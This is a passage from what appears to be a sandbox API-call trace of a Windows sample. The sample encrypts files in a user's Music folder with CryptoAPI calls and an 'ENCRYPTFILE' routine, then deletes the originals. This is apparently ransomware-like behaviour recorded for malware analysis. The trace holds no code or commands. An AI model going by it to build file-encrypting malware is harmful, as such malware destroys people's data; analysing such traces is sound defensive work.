cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.068] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.068] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xba00, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xba00, lpOverlapped=0x0) returned 1 [0118.070] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0118.070] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.070] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca4d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0118.070] CryptDestroyKey (hKey=0x41ac640) returned 1 [0118.070] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.071] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.071] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0118.071] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0118.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.071] FreeLibrary (hLibModule=0x756e0000) returned 1 [0118.071] CloseHandle (hObject=0x258) returned 1 [0118.071] CloseHandle (hObject=0x298) returned 1 [0118.074] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav", lpFilePart=0x0) returned 0x31 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0118.074] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\lj_rjdqgish84bcgxk.wav")) returned 0x20 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0118.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.074] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ea4ef0, ftCreationTime.dwHighDateTime=0x1d5e0e5, ftLastAccessTime.dwLowDateTime=0x944918e0, ftLastAccessTime.dwHighDateTime=0x1d5e53a, ftLastWriteTime.dwLowDateTime=0x944918e0, ftLastWriteTime.dwHighDateTime=0x1d5e53a, nFileSizeHigh=0x0, nFileSizeLow=0xb9fc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lJ_RJDQgish84bCgxK.wav", cAlternateFileName="LJ_RJD~1.WAV")) returned 0x41ac500 [0118.074] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\lJ_RJDQgish84bCgxK.wav" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\lj_rjdqgish84bcgxk.wav")) returned 1 [0118.081] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38ea4ef0, ftCreationTime.dwHighDateTime=0x1d5e0e5, ftLastAccessTime.dwLowDateTime=0x944918e0, ftLastAccessTime.dwHighDateTime=0x1d5e53a, ftLastWriteTime.dwLowDateTime=0x944918e0, ftLastWriteTime.dwHighDateTime=0x1d5e53a, nFileSizeHigh=0x0, nFileSizeLow=0xb9fc, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="lJ_RJDQgish84bCgxK.wav", cAlternateFileName="LJ_RJD~1.WAV")) returned 0 [0118.081] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d7d0 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0118.081] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0118.081] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fb0 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f98 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0118.081] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.082] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.082] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.082] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0118.082] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.082] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f08 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.083] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0118.083] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.083] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0118.083] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0118.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0118.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0118.090] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0118.090] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.090] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d50a20, ftCreationTime.dwHighDateTime=0x1d5e269, ftLastAccessTime.dwLowDateTime=0x90642aa0, ftLastAccessTime.dwHighDateTime=0x1d5ec9a, ftLastWriteTime.dwLowDateTime=0x90642aa0, ftLastWriteTime.dwHighDateTime=0x1d5ec9a, nFileSizeHigh=0x0, nFileSizeLow=0xee2a, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="vgfSxUhhzUZpNrrLJ3hR.mp3", cAlternateFileName="VGFSXU~1.MP3")) returned 0x41ac280 [0118.090] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0118.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0118.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0118.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0118.091] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0118.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0118.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0118.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0118.091] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0118.091] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0118.092] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0118.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0118.092] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0118.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0118.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0118.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0118.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0118.092] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0118.092] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0118.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0118.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0118.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0118.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0118.093] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0118.093] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0118.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0118.094] 